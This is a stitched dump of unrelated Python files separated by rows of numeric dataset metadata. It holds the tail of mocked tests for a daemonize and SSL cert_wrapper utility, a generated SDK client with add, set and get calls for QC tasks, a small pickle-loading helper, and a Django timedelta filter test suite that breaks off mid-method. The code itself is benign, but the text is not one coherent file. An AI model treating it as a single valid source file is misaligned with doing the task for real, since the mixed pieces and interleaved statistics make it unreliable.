cp = mock_SafeConfigParser.return_value
result = util.cert_wrapper('alt_conf[alt_profile]', 'test')
self.assertEqual(result, 'wrapper')
mock_expanduser.assert_called_once_with('alt_conf')
mock_SafeConfigParser.assert_called_once_with()
cp.read.assert_called_once_with('/home/dir/.heyu.cert')
cp.items.assert_called_once_with('alt_profile')
mock_TendrilPartial.assert_called_once_with(
ssl.wrap_socket, keyfile='key', certfile='cert', ca_certs='ca',
server_side=False, cert_reqs=ssl.CERT_REQUIRED,
ssl_version=ssl.PROTOCOL_TLSv1)
class MyBytesIO(io.BytesIO):
"""
Override close() to preserve the emitted contents.
"""
def close(self):
self.contents = self.getvalue()
super(MyBytesIO, self).close()
class DaemonizeTest(unittest.TestCase):
@mock.patch('os.chdir')
@mock.patch('os.umask')
@mock.patch('os.fork', return_value=0)
@mock.patch('os._exit')
@mock.patch('os.setsid')
@mock.patch('os.open', return_value=3)
@mock.patch('os.dup2')
@mock.patch('os.close')
@mock.patch('os.getpid', return_value=1234)
@mock.patch('__builtin__.open', return_value=MyBytesIO())
@mock.patch('sys.stdin', mock.Mock(**{'fileno.return_value': 0}))
@mock.patch('sys.stdout', mock.Mock(**{'fileno.return_value': 1}))
@mock.patch('sys.stderr', mock.Mock(**{'fileno.return_value': 2}))
def test_child_basic(self, mock_open, mock_getpid, mock_close, mock_dup2,
mock_os_open, mock_setsid, mock_exit, mock_fork,
mock_umask, mock_chdir):
util.daemonize()
mock_chdir.assert_called_once_with('/')
mock_umask.assert_called_once_with(0)
mock_fork.assert_has_calls([mock.call(), mock.call()])
self.assertFalse(mock_exit.called)
mock_setsid.assert_called_once_with()
mock_os_open.assert_called_once_with(os.devnull, os.O_RDWR)
mock_dup2.assert_has_calls([
mock.call(3, 0),
mock.call(3, 1),
mock.call(3, 2),
])
mock_close.assert_called_once_with(3)
self.assertFalse(mock_getpid.called)
self.assertFalse(mock_open.called)
@mock.patch('os.chdir')
@mock.patch('os.umask')
@mock.patch('os.fork', return_value=1234)
@mock.patch('os._exit')
@mock.patch('os.setsid')
@mock.patch('os.open', return_value=3)
@mock.patch('os.dup2')
@mock.patch('os.close')
@mock.patch('os.getpid', return_value=1234)
@mock.patch('__builtin__.open', return_value=MyBytesIO())
@mock.patch('sys.stdin', mock.Mock(**{'fileno.return_value': 0}))
@mock.patch('sys.stdout', mock.Mock(**{'fileno.return_value': 1}))
@mock.patch('sys.stderr', mock.Mock(**{'fileno.return_value': 2}))
def test_parent_basic(self, mock_open, mock_getpid, mock_close, mock_dup2,
mock_os_open, mock_setsid, mock_exit, mock_fork,
mock_umask, mock_chdir):
util.daemonize()
mock_chdir.assert_called_once_with('/')
mock_umask.assert_called_once_with(0)
mock_fork.assert_has_calls([mock.call(), mock.call()])
mock_exit.assert_has_calls([mock.call(0), mock.call(0)])
mock_setsid.assert_called_once_with()
mock_os_open.assert_called_once_with(os.devnull, os.O_RDWR)
mock_dup2.assert_has_calls([
mock.call(3, 0),
mock.call(3, 1),
mock.call(3, 2),
])
mock_close.assert_called_once_with(3)
self.assertFalse(mock_getpid.called)
self.assertFalse(mock_open.called)
@mock.patch('os.chdir')
@mock.patch('os.umask')
@mock.patch('os.fork', return_value=0)
@mock.patch('os._exit')
@mock.patch('os.setsid')
@mock.patch('os.open', return_value=0)
@mock.patch('os.dup2')
@mock.patch('os.close')
@mock.patch('os.getpid', return_value=1234)
@mock.patch('__builtin__.open', return_value=MyBytesIO())
@mock.patch('sys.stdin', mock.Mock(**{'fileno.return_value': 0}))
@mock.patch('sys.stdout', mock.Mock(**{'fileno.return_value': 1}))
@mock.patch('sys.stderr', mock.Mock(**{'fileno.return_value': 2}))
def test_devnull0(self, mock_open, mock_getpid, mock_close, mock_dup2,
mock_os_open, mock_setsid, mock_exit, mock_fork,
mock_umask, mock_chdir):
util.daemonize()
mock_chdir.assert_called_once_with('/')
mock_umask.assert_called_once_with(0)
mock_fork.assert_has_calls([mock.call(), mock.call()])
self.assertFalse(mock_exit.called)
mock_setsid.assert_called_once_with()
mock_os_open.assert_called_once_with(os.devnull, os.O_RDWR)
mock_dup2.assert_has_calls([
mock.call(0, 0),
mock.call(0, 1),
mock.call(0, 2),
])
self.assertFalse(mock_close.called)
self.assertFalse(mock_getpid.called)
self.assertFalse(mock_open.called)
@mock.patch('os.chdir')
@mock.patch('os.umask')
@mock.patch('os.fork', return_value=0)
@mock.patch('os._exit')
@mock.patch('os.setsid')
@mock.patch('os.open', return_value=3)
@mock.patch('os.dup2')
@mock.patch('os.close')
@mock.patch('os.getpid', return_value=1234)
@mock.patch('__builtin__.open', return_value=MyBytesIO())
@mock.patch('sys.stdin', mock.Mock(**{'fileno.return_value': 0}))
@mock.patch('sys.stdout', mock.Mock(**{'fileno.return_value': 1}))
@mock.patch('sys.stderr', mock.Mock(**{'fileno.return_value': 2}))
def test_alt_workdir(self, mock_open, mock_getpid, mock_close, mock_dup2,
mock_os_open, mock_setsid, mock_exit, mock_fork,
mock_umask, mock_chdir):
util.daemonize(workdir='/work/dir')
mock_chdir.assert_called_once_with('/work/dir')
mock_umask.assert_called_once_with(0)
mock_fork.assert_has_calls([mock.call(), mock.call()])
self.assertFalse(mock_exit.called)
mock_setsid.assert_called_once_with()
mock_os_open.assert_called_once_with(os.devnull, os.O_RDWR)
mock_dup2.assert_has_calls([
mock.call(3, 0),
mock.call(3, 1),
mock.call(3, 2),
])
mock_close.assert_called_once_with(3)
self.assertFalse(mock_getpid.called)
self.assertFalse(mock_open.called)
@mock.patch('os.chdir')
@mock.patch('os.umask')
@mock.patch('os.fork', return_value=0)
@mock.patch('os._exit')
@mock.patch('os.setsid')
@mock.patch('os.open', return_value=3)
@mock.patch('os.dup2')
@mock.patch('os.close')
@mock.patch('os.getpid', return_value=1234)
@mock.patch('__builtin__.open', return_value=MyBytesIO())
@mock.patch('sys.stdin', mock.Mock(**{'fileno.return_value': 0}))
@mock.patch('sys.stdout', mock.Mock(**{'fileno.return_value': 1}))
@mock.patch('sys.stderr', mock.Mock(**{'fileno.return_value': 2}))
def test_with_pidfile(self, mock_open, mock_getpid, mock_close, mock_dup2,
mock_os_open, mock_setsid, mock_exit, mock_fork,
mock_umask, mock_chdir):
util.daemonize(pidfile='/some/file.pid')
mock_chdir.assert_called_once_with('/')
mock_umask.assert_called_once_with(0)
mock_fork.assert_has_calls([mock.call(), mock.call()])
self.assertFalse(mock_exit.called)
mock_setsid.assert_called_once_with()
mock_os_open.assert_called_once_with(os.devnull, os.O_RDWR)
mock_dup2.assert_has_calls([
mock.call(3, 0),
mock.call(3, 1),
mock.call(3, 2),
])
mock_close.assert_called_once_with(3)
mock_getpid.assert_called_once_with()
mock_open.assert_called_once_with('/some/file.pid', 'w')
self.assertEqual(mock_open.return_value.contents, '1234\n')
| 44.022071
| 79
| 0.652397
| 3,223
| 25,929
| 4.98852
| 0.06857
| 0.068852
| 0.082597
| 0.103247
| 0.902724
| 0.899055
| 0.889601
| 0.886118
| 0.877037
| 0.862048
| 0
| 0.013831
| 0.202515
| 25,929
| 588
| 80
| 44.096939
| 0.76371
| 0.024953
| 0
| 0.762677
| 0
| 0
| 0.162119
| 0.025066
| 0
| 0
| 0
| 0
| 0.324544
| 1
| 0.068966
| false
| 0.002028
| 0.016227
| 0
| 0.099391
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5cf231d4b0ca26fc47ab7bbb62f3eb2c00b539d6
| 11,550
|
py
|
Python
|
ambra_sdk/service/entrypoints/generated/qctask.py
|
dicomgrid/sdk-python
|
bb12eed311bad73dfb863917df4dc5cbcd91a447
|
[
"Apache-2.0"
] | 9
|
2020-04-20T23:45:44.000Z
|
2021-04-18T11:22:17.000Z
|
ambra_sdk/service/entrypoints/generated/qctask.py
|
dicomgrid/sdk-python
|
bb12eed311bad73dfb863917df4dc5cbcd91a447
|
[
"Apache-2.0"
] | 13
|
2020-02-08T16:15:05.000Z
|
2021-09-13T22:55:28.000Z
|
ambra_sdk/service/entrypoints/generated/qctask.py
|
dicomgrid/sdk-python
|
bb12eed311bad73dfb863917df4dc5cbcd91a447
|
[
"Apache-2.0"
] | 6
|
2020-03-25T17:47:45.000Z
|
2021-04-18T11:22:19.000Z
|
""" Qctask.
Do not edit this file by hand.
This is generated by parsing api.html service doc.
"""
from ambra_sdk.exceptions.service import InvalidInteger
from ambra_sdk.exceptions.service import InvisibleQuery
from ambra_sdk.exceptions.service import MissingFields
from ambra_sdk.exceptions.service import NamespaceNotAccountRelated
from ambra_sdk.exceptions.service import NotFound
from ambra_sdk.exceptions.service import NotOwningNamespace
from ambra_sdk.exceptions.service import NotPermitted
from ambra_sdk.service.query import QueryO
from ambra_sdk.service.query import AsyncQueryO
class Qctask:
"""Qctask."""
def __init__(self, api):
self._api = api
def add(
self,
namespace_id,
customfield_param=None,
message=None,
priority=None,
query_id=None,
studies=None,
user_id=None,
):
"""Add.
:param namespace_id: Id of the namespace assigned to the QC Task
:param customfield_param: Custom field(s) (optional)
:param message: Explanatory message for the QC Task (optional)
:param priority: QC Task priority (optional)
:param query_id: Id of the query to associate the QC Task to (optional)
:param studies: A JSON array of the study uuid(s) (optional)
:param user_id: Id of the user to assign the QC Task to (optional)
"""
request_data = {
'message': message,
'namespace_id': namespace_id,
'priority': priority,
'query_id': query_id,
'studies': studies,
'user_id': user_id,
}
if customfield_param is not None:
customfield_param_dict = {'{prefix}{k}'.format(prefix='customfield-', k=k): v for k,v in customfield_param.items()}
request_data.update(customfield_param_dict)
errors_mapping = {}
errors_mapping[('INVALID_INTEGER', None)] = InvalidInteger('An invalid integer was passed. The error_subtype holds the name of the invalid integer')
errors_mapping[('INVISIBLE_QUERY', None)] = InvisibleQuery('The passed Query is not visible to the user the QC Task is being assigned to')
errors_mapping[('MISSING_FIELDS', None)] = MissingFields('A required field is missing or does not have data in it. The error_subtype holds a array of all the missing fields')
errors_mapping[('NAMESPACE_NOT_ACCOUNT_RELATED', None)] = NamespaceNotAccountRelated('The assigned namespace is not associated with an Account (it is a PHR account)')
errors_mapping[('NOT_FOUND', None)] = NotFound('The object was not found. The error_subtype holds the type of object not found')
errors_mapping[('NOT_OWNING_NAMESPACE', None)] = NotOwningNamespace('The assigned namespace is not an owning namespace for the passed Query')
errors_mapping[('NOT_PERMITTED', None)] = NotPermitted('You are not permitted to assign a QC Task to the namespace')
query_data = {
'api': self._api,
'url': '/qctask/add',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': True,
}
return QueryO(**query_data)
def set(
self,
uuid,
customfield_param=None,
message=None,
priority=None,
studies=None,
user_id=None,
):
"""Set.
:param uuid: The QC Task uuid
:param customfield_param: Custom field(s) (optional)
:param message: Explanatory message for the QC Task (optional)
:param priority: QC Task priority (optional)
:param studies: A JSON array of the study uuid(s) (optional)
:param user_id: Id of the user to assign the QC Task to (optional)
"""
request_data = {
'message': message,
'priority': priority,
'studies': studies,
'user_id': user_id,
'uuid': uuid,
}
if customfield_param is not None:
customfield_param_dict = {'{prefix}{k}'.format(prefix='customfield-', k=k): v for k,v in customfield_param.items()}
request_data.update(customfield_param_dict)
errors_mapping = {}
errors_mapping[('INVALID_INTEGER', None)] = InvalidInteger('An invalid integer was passed. The error_subtype holds the name of the invalid integer')
errors_mapping[('INVISIBLE_QUERY', None)] = InvisibleQuery('The passed Query is not visible to the user the QC Task is being assigned to')
errors_mapping[('MISSING_FIELDS', None)] = MissingFields('A required field is missing or does not have data in it. The error_subtype holds a array of all the missing fields')
errors_mapping[('NOT_FOUND', None)] = NotFound('The object was not found. The error_subtype holds the type of object not found')
errors_mapping[('NOT_PERMITTED', None)] = NotPermitted('You are not permitted to edit the QC Task')
query_data = {
'api': self._api,
'url': '/qctask/set',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': True,
}
return QueryO(**query_data)
def get(
self,
uuid,
):
"""Get.
:param uuid: The QC Task uuid
"""
request_data = {
'uuid': uuid,
}
errors_mapping = {}
errors_mapping[('MISSING_FIELDS', None)] = MissingFields('A required field is missing or does not have data in it. The error_subtype holds a array of all the missing fields')
errors_mapping[('NOT_FOUND', None)] = NotFound('The QC Task can not be found')
errors_mapping[('NOT_PERMITTED', None)] = NotPermitted('You are not permitted to view the QC Task')
query_data = {
'api': self._api,
'url': '/qctask/get',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': True,
}
return QueryO(**query_data)
class AsyncQctask:
"""AsyncQctask."""
def __init__(self, api):
self._api = api
def add(
self,
namespace_id,
customfield_param=None,
message=None,
priority=None,
query_id=None,
studies=None,
user_id=None,
):
"""Add.
:param namespace_id: Id of the namespace assigned to the QC Task
:param customfield_param: Custom field(s) (optional)
:param message: Explanatory message for the QC Task (optional)
:param priority: QC Task priority (optional)
:param query_id: Id of the query to associate the QC Task to (optional)
:param studies: A JSON array of the study uuid(s) (optional)
:param user_id: Id of the user to assign the QC Task to (optional)
"""
request_data = {
'message': message,
'namespace_id': namespace_id,
'priority': priority,
'query_id': query_id,
'studies': studies,
'user_id': user_id,
}
if customfield_param is not None:
customfield_param_dict = {'{prefix}{k}'.format(prefix='customfield-', k=k): v for k,v in customfield_param.items()}
request_data.update(customfield_param_dict)
errors_mapping = {}
errors_mapping[('INVALID_INTEGER', None)] = InvalidInteger('An invalid integer was passed. The error_subtype holds the name of the invalid integer')
errors_mapping[('INVISIBLE_QUERY', None)] = InvisibleQuery('The passed Query is not visible to the user the QC Task is being assigned to')
errors_mapping[('MISSING_FIELDS', None)] = MissingFields('A required field is missing or does not have data in it. The error_subtype holds a array of all the missing fields')
errors_mapping[('NAMESPACE_NOT_ACCOUNT_RELATED', None)] = NamespaceNotAccountRelated('The assigned namespace is not associated with an Account (it is a PHR account)')
errors_mapping[('NOT_FOUND', None)] = NotFound('The object was not found. The error_subtype holds the type of object not found')
errors_mapping[('NOT_OWNING_NAMESPACE', None)] = NotOwningNamespace('The assigned namespace is not an owning namespace for the passed Query')
errors_mapping[('NOT_PERMITTED', None)] = NotPermitted('You are not permitted to assign a QC Task to the namespace')
query_data = {
'api': self._api,
'url': '/qctask/add',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': True,
}
return AsyncQueryO(**query_data)
def set(
self,
uuid,
customfield_param=None,
message=None,
priority=None,
studies=None,
user_id=None,
):
"""Set.
:param uuid: The QC Task uuid
:param customfield_param: Custom field(s) (optional)
:param message: Explanatory message for the QC Task (optional)
:param priority: QC Task priority (optional)
:param studies: A JSON array of the study uuid(s) (optional)
:param user_id: Id of the user to assign the QC Task to (optional)
"""
request_data = {
'message': message,
'priority': priority,
'studies': studies,
'user_id': user_id,
'uuid': uuid,
}
if customfield_param is not None:
customfield_param_dict = {'{prefix}{k}'.format(prefix='customfield-', k=k): v for k,v in customfield_param.items()}
request_data.update(customfield_param_dict)
errors_mapping = {}
errors_mapping[('INVALID_INTEGER', None)] = InvalidInteger('An invalid integer was passed. The error_subtype holds the name of the invalid integer')
errors_mapping[('INVISIBLE_QUERY', None)] = InvisibleQuery('The passed Query is not visible to the user the QC Task is being assigned to')
errors_mapping[('MISSING_FIELDS', None)] = MissingFields('A required field is missing or does not have data in it. The error_subtype holds a array of all the missing fields')
errors_mapping[('NOT_FOUND', None)] = NotFound('The object was not found. The error_subtype holds the type of object not found')
errors_mapping[('NOT_PERMITTED', None)] = NotPermitted('You are not permitted to edit the QC Task')
query_data = {
'api': self._api,
'url': '/qctask/set',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': True,
}
return AsyncQueryO(**query_data)
def get(
self,
uuid,
):
"""Get.
:param uuid: The QC Task uuid
"""
request_data = {
'uuid': uuid,
}
errors_mapping = {}
errors_mapping[('MISSING_FIELDS', None)] = MissingFields('A required field is missing or does not have data in it. The error_subtype holds a array of all the missing fields')
errors_mapping[('NOT_FOUND', None)] = NotFound('The QC Task can not be found')
errors_mapping[('NOT_PERMITTED', None)] = NotPermitted('You are not permitted to view the QC Task')
query_data = {
'api': self._api,
'url': '/qctask/get',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': True,
}
return AsyncQueryO(**query_data)
| 44.252874
| 182
| 0.631255
| 1,430
| 11,550
| 4.93986
| 0.082517
| 0.088335
| 0.033126
| 0.039638
| 0.966591
| 0.966591
| 0.923415
| 0.923415
| 0.923415
| 0.923415
| 0
| 0
| 0.27368
| 11,550
| 261
| 183
| 44.252874
| 0.842055
| 0.146407
| 0
| 0.880829
| 1
| 0.031088
| 0.346549
| 0.006083
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041451
| false
| 0.051813
| 0.046632
| 0
| 0.129534
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
cf132892ff4a22f601b2201ba52c03beff6da0b9
| 795
|
py
|
Python
|
pseudo_mask/tools/read_info.py
|
alisure-fork/CONTA
|
dde3e5083f45598d859dde889de3ae85c7a416e9
|
[
"MIT"
] | null | null | null |
pseudo_mask/tools/read_info.py
|
alisure-fork/CONTA
|
dde3e5083f45598d859dde889de3ae85c7a416e9
|
[
"MIT"
] | null | null | null |
pseudo_mask/tools/read_info.py
|
alisure-fork/CONTA
|
dde3e5083f45598d859dde889de3ae85c7a416e9
|
[
"MIT"
] | null | null | null |
import os
from alisuretool.Tools import Tools
def read_image_info(image_info_root):
image_info_path = os.path.join(image_info_root, "deal", "image_info_list_change_person2.pkl")
# image_info_list = Tools.read_from_pkl(image_info_path)[::200]
image_info_list = Tools.read_from_pkl(image_info_path)
return image_info_list
def read_image_info_test(image_info_root):
image_info_path = os.path.join(image_info_root, "deal", "image_info_list_test_for_conta.pkl")
image_info_list = Tools.read_from_pkl(image_info_path)
return image_info_list
def read_image_info_val(image_info_root):
image_info_path = os.path.join(image_info_root, "deal", "image_info_list_val_for_conta.pkl")
image_info_list = Tools.read_from_pkl(image_info_path)
return image_info_list
| 34.565217
| 97
| 0.798742
| 133
| 795
| 4.24812
| 0.172932
| 0.414159
| 0.230089
| 0.127434
| 0.849558
| 0.849558
| 0.849558
| 0.849558
| 0.849558
| 0.849558
| 0
| 0.005698
| 0.116981
| 795
| 22
| 98
| 36.136364
| 0.799145
| 0.07673
| 0
| 0.428571
| 0
| 0
| 0.154583
| 0.138167
| 0
| 0
| 0
| 0
| 0
| 1
| 0.214286
| false
| 0
| 0.142857
| 0
| 0.571429
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 10
|
cf1cf5c58dbed2e6d448a79246f6b3e38ba3f512
| 12,000
|
py
|
Python
|
timedeltatemplatefilter/tests/tests.py
|
frnhr/django_timedeltatemplatefilter
|
d22c2a564b4ccbdc7443ff6928fdf7224ac0a01f
|
[
"Unlicense"
] | 12
|
2016-01-24T02:38:54.000Z
|
2020-10-06T03:25:34.000Z
|
timedeltatemplatefilter/tests/tests.py
|
frnhr/django_timedeltatemplatefilter
|
d22c2a564b4ccbdc7443ff6928fdf7224ac0a01f
|
[
"Unlicense"
] | 4
|
2017-02-07T18:18:50.000Z
|
2019-11-17T17:29:30.000Z
|
timedeltatemplatefilter/tests/tests.py
|
frnhr/django_timedeltatemplatefilter
|
d22c2a564b4ccbdc7443ff6928fdf7224ac0a01f
|
[
"Unlicense"
] | 2
|
2017-02-07T18:33:45.000Z
|
2018-09-17T00:32:13.000Z
|
from datetime import timedelta
from django.test import TestCase
from timedeltatemplatefilter.templatetags.timedelta_filter import timedelta as the_filter
class SimpleTestCase(TestCase):
def test_seconds_only_2(self):
test_value = timedelta(seconds=2)
self.assertEqual(the_filter(test_value, '{seconds}'), '2')
self.assertEqual(the_filter(test_value, '{seconds_total}'), '2')
self.assertEqual(the_filter(test_value, '{seconds2}'), '02')
self.assertEqual(the_filter(test_value, '{minutes}'), '0')
self.assertEqual(the_filter(test_value, '{minutes_total}'), '0')
self.assertEqual(the_filter(test_value, '{minutes2}'), '00')
self.assertEqual(the_filter(test_value, '{hours}'), '0')
self.assertEqual(the_filter(test_value, '{hours_total}'), '0')
self.assertEqual(the_filter(test_value, '{hours2}'), '00')
self.assertEqual(the_filter(test_value, '{days}'), '0')
self.assertEqual(the_filter(test_value, '{days_total}'), '0')
self.assertEqual(the_filter(test_value, '{years}'), '0')
self.assertEqual(the_filter(test_value, '{years_total}'), '0')
def test_seconds_only_42(self):
test_value = timedelta(seconds=42)
self.assertEqual(the_filter(test_value, '{seconds}'), '42')
self.assertEqual(the_filter(test_value, '{seconds_total}'), '42')
self.assertEqual(the_filter(test_value, '{seconds2}'), '42')
self.assertEqual(the_filter(test_value, '{minutes}'), '0')
self.assertEqual(the_filter(test_value, '{minutes_total}'), '0')
self.assertEqual(the_filter(test_value, '{minutes2}'), '00')
self.assertEqual(the_filter(test_value, '{hours}'), '0')
self.assertEqual(the_filter(test_value, '{hours_total}'), '0')
self.assertEqual(the_filter(test_value, '{hours2}'), '00')
self.assertEqual(the_filter(test_value, '{days}'), '0')
self.assertEqual(the_filter(test_value, '{days_total}'), '0')
self.assertEqual(the_filter(test_value, '{years}'), '0')
self.assertEqual(the_filter(test_value, '{years_total}'), '0')
def test_minutes_only_3(self):
test_value = timedelta(seconds=3*60)
self.assertEqual(the_filter(test_value, '{seconds}'), '0')
self.assertEqual(the_filter(test_value, '{seconds_total}'), '180')
self.assertEqual(the_filter(test_value, '{seconds2}'), '00')
self.assertEqual(the_filter(test_value, '{minutes}'), '3')
self.assertEqual(the_filter(test_value, '{minutes_total}'), '3')
self.assertEqual(the_filter(test_value, '{minutes2}'), '03')
self.assertEqual(the_filter(test_value, '{hours}'), '0')
self.assertEqual(the_filter(test_value, '{hours_total}'), '0')
self.assertEqual(the_filter(test_value, '{hours2}'), '00')
self.assertEqual(the_filter(test_value, '{days}'), '0')
self.assertEqual(the_filter(test_value, '{days_total}'), '0')
self.assertEqual(the_filter(test_value, '{years}'), '0')
self.assertEqual(the_filter(test_value, '{years_total}'), '0')
def test_minutes_only_32(self):
test_value = timedelta(seconds=32*60)
self.assertEqual(the_filter(test_value, '{seconds}'), '0')
self.assertEqual(the_filter(test_value, '{seconds_total}'), '1920')
self.assertEqual(the_filter(test_value, '{seconds2}'), '00')
self.assertEqual(the_filter(test_value, '{minutes}'), '32')
self.assertEqual(the_filter(test_value, '{minutes_total}'), '32')
self.assertEqual(the_filter(test_value, '{minutes2}'), '32')
self.assertEqual(the_filter(test_value, '{hours}'), '0')
self.assertEqual(the_filter(test_value, '{hours_total}'), '0')
self.assertEqual(the_filter(test_value, '{hours2}'), '00')
self.assertEqual(the_filter(test_value, '{days}'), '0')
self.assertEqual(the_filter(test_value, '{days_total}'), '0')
self.assertEqual(the_filter(test_value, '{years}'), '0')
self.assertEqual(the_filter(test_value, '{years_total}'), '0')
def test_hounrs_only_7(self):
test_value = timedelta(seconds=7*3600)
self.assertEqual(the_filter(test_value, '{seconds}'), '0')
self.assertEqual(the_filter(test_value, '{seconds_total}'), '25200')
self.assertEqual(the_filter(test_value, '{seconds2}'), '00')
self.assertEqual(the_filter(test_value, '{minutes}'), '0')
self.assertEqual(the_filter(test_value, '{minutes_total}'), '420')
self.assertEqual(the_filter(test_value, '{minutes2}'), '00')
self.assertEqual(the_filter(test_value, '{hours}'), '7')
self.assertEqual(the_filter(test_value, '{hours_total}'), '7')
self.assertEqual(the_filter(test_value, '{hours2}'), '07')
self.assertEqual(the_filter(test_value, '{days}'), '0')
self.assertEqual(the_filter(test_value, '{days_total}'), '0')
self.assertEqual(the_filter(test_value, '{years}'), '0')
self.assertEqual(the_filter(test_value, '{years_total}'), '0')
def test_hours_only_17(self):
test_value = timedelta(seconds=17*3600)
self.assertEqual(the_filter(test_value, '{seconds}'), '0')
self.assertEqual(the_filter(test_value, '{seconds_total}'), '61200')
self.assertEqual(the_filter(test_value, '{seconds2}'), '00')
self.assertEqual(the_filter(test_value, '{minutes}'), '0')
self.assertEqual(the_filter(test_value, '{minutes_total}'), '1020')
self.assertEqual(the_filter(test_value, '{minutes2}'), '00')
self.assertEqual(the_filter(test_value, '{hours}'), '17')
self.assertEqual(the_filter(test_value, '{hours_total}'), '17')
self.assertEqual(the_filter(test_value, '{hours2}'), '17')
self.assertEqual(the_filter(test_value, '{days}'), '0')
self.assertEqual(the_filter(test_value, '{days_total}'), '0')
self.assertEqual(the_filter(test_value, '{years}'), '0')
self.assertEqual(the_filter(test_value, '{years_total}'), '0')
def test_days_only_4(self):
test_value = timedelta(days=4)
self.assertEqual(the_filter(test_value, '{seconds}'), '0')
self.assertEqual(the_filter(test_value, '{seconds_total}'), '345600')
self.assertEqual(the_filter(test_value, '{seconds2}'), '00')
self.assertEqual(the_filter(test_value, '{minutes}'), '0')
self.assertEqual(the_filter(test_value, '{minutes_total}'), '5760')
self.assertEqual(the_filter(test_value, '{minutes2}'), '00')
self.assertEqual(the_filter(test_value, '{hours}'), '0')
self.assertEqual(the_filter(test_value, '{hours_total}'), '96')
self.assertEqual(the_filter(test_value, '{hours2}'), '00')
self.assertEqual(the_filter(test_value, '{days}'), '4')
self.assertEqual(the_filter(test_value, '{days_total}'), '4')
self.assertEqual(the_filter(test_value, '{years}'), '0')
self.assertEqual(the_filter(test_value, '{years_total}'), '0')
def test_days_only_74(self):
test_value = timedelta(days=74)
self.assertEqual(the_filter(test_value, '{seconds}'), '0')
self.assertEqual(the_filter(test_value, '{seconds_total}'), '6393600')
self.assertEqual(the_filter(test_value, '{seconds2}'), '00')
self.assertEqual(the_filter(test_value, '{minutes}'), '0')
self.assertEqual(the_filter(test_value, '{minutes_total}'), '106560')
self.assertEqual(the_filter(test_value, '{minutes2}'), '00')
self.assertEqual(the_filter(test_value, '{hours}'), '0')
self.assertEqual(the_filter(test_value, '{hours_total}'), '1776')
self.assertEqual(the_filter(test_value, '{hours2}'), '00')
self.assertEqual(the_filter(test_value, '{days}'), '74')
self.assertEqual(the_filter(test_value, '{days_total}'), '74')
self.assertEqual(the_filter(test_value, '{years}'), '0')
self.assertEqual(the_filter(test_value, '{years_total}'), '0')
def test_years_only_10(self):
test_value = timedelta(days=10*365)
self.assertEqual(the_filter(test_value, '{seconds}'), '0')
self.assertEqual(the_filter(test_value, '{seconds_total}'), '315360000')
self.assertEqual(the_filter(test_value, '{seconds2}'), '00')
self.assertEqual(the_filter(test_value, '{minutes}'), '0')
self.assertEqual(the_filter(test_value, '{minutes_total}'), '5256000')
self.assertEqual(the_filter(test_value, '{minutes2}'), '00')
self.assertEqual(the_filter(test_value, '{hours}'), '0')
self.assertEqual(the_filter(test_value, '{hours_total}'), '87600')
self.assertEqual(the_filter(test_value, '{hours2}'), '00')
self.assertEqual(the_filter(test_value, '{days}'), '0')
self.assertEqual(the_filter(test_value, '{days_total}'), '3650')
self.assertEqual(the_filter(test_value, '{years}'), '10')
self.assertEqual(the_filter(test_value, '{years_total}'), '10')
def test_random_1(self):
test_value = timedelta(days=12345, seconds=28221)
self.assertEqual(the_filter(test_value, '{seconds}'), '21')
self.assertEqual(the_filter(test_value, '{seconds_total}'), '1066636221')
self.assertEqual(the_filter(test_value, '{seconds2}'), '21')
self.assertEqual(the_filter(test_value, '{minutes}'), '50')
self.assertEqual(the_filter(test_value, '{minutes_total}'), '17777270')
self.assertEqual(the_filter(test_value, '{minutes2}'), '50')
self.assertEqual(the_filter(test_value, '{hours}'), '7')
self.assertEqual(the_filter(test_value, '{hours_total}'), '296287')
self.assertEqual(the_filter(test_value, '{hours2}'), '07')
self.assertEqual(the_filter(test_value, '{days}'), '300')
self.assertEqual(the_filter(test_value, '{days_total}'), '12345')
self.assertEqual(the_filter(test_value, '{years}'), '33')
self.assertEqual(the_filter(test_value, '{years_total}'), '33')
def test_random_2(self):
test_value = timedelta(seconds=347979675)
self.assertEqual(the_filter(test_value, '{seconds}'), '15')
self.assertEqual(the_filter(test_value, '{seconds_total}'), '347979675')
self.assertEqual(the_filter(test_value, '{seconds2}'), '15')
self.assertEqual(the_filter(test_value, '{minutes}'), '1')
self.assertEqual(the_filter(test_value, '{minutes_total}'), '5799661')
self.assertEqual(the_filter(test_value, '{minutes2}'), '01')
self.assertEqual(the_filter(test_value, '{hours}'), '13')
self.assertEqual(the_filter(test_value, '{hours_total}'), '96661')
self.assertEqual(the_filter(test_value, '{hours2}'), '13')
self.assertEqual(the_filter(test_value, '{days}'), '12')
self.assertEqual(the_filter(test_value, '{days_total}'), '4027')
self.assertEqual(the_filter(test_value, '{years}'), '11')
self.assertEqual(the_filter(test_value, '{years_total}'), '11')
def test_random_3(self):
test_value = timedelta(seconds=347980455)
self.assertEqual(the_filter(test_value, '{seconds}'), '15')
self.assertEqual(the_filter(test_value, '{seconds_total}'), '347980455')
self.assertEqual(the_filter(test_value, '{seconds2}'), '15')
self.assertEqual(the_filter(test_value, '{minutes}'), '14')
self.assertEqual(the_filter(test_value, '{minutes_total}'), '5799674')
self.assertEqual(the_filter(test_value, '{minutes2}'), '14')
self.assertEqual(the_filter(test_value, '{hours}'), '13')
self.assertEqual(the_filter(test_value, '{hours_total}'), '96661')
